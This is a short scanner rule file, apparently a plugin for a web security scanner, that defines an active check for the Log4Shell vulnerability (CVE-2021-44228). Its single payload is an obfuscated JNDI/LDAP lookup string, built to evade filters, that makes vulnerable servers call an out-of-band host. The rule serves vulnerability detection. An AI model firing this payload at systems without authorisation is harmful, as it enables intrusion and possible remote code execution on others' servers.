name = active-log4shell
type = Active
enabled = true
detail = {
    severity = High
    confidence = Firm
    author = "XhstormR"
    description = """CVE-2021-44228"""
    links = [
        "https://www.lunasec.io/docs/blog/log4j-zero-day/"
    ]
}
rules = [
    {
        payload = {
            part = Any
            name = "*"
            oob = true
            values = [
                """${${:::::::-j}${0THESE:-n}d${lower:I}:l${1QZA2wxs:-d}ap://#{OOB}/a}"""
            ]
        }
        matchers = [
            { include "snippet-matcher-exclude-static.properties" }
            { include "snippet-matcher-exclude-binary.properties" }
        ]
    }
]
